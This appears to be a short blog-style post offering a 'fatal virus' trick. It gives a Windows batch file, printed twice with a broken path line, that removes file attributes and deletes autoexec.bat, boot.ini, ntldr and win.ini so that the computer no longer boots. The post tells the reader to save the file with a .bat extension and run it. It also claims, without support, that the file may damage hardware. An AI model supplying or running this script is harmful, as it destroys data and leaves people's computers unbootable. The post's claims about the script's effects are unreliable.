This
dangerous trick will shut down your computer forever and it will never start
again without installing new windows. The fatal virus is created through
notepad and it can be harmful for your computer.
Copy
the following code into notepad new
file
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini
save
the file with any name with .bat extension.
Once executed,
it will breakdown all functions and will delete the windows files required to
boot the computer.
So you
can use it only when you don’t need to restart your computer without installing
new windows.
Note:
it may harm your system hardware as well.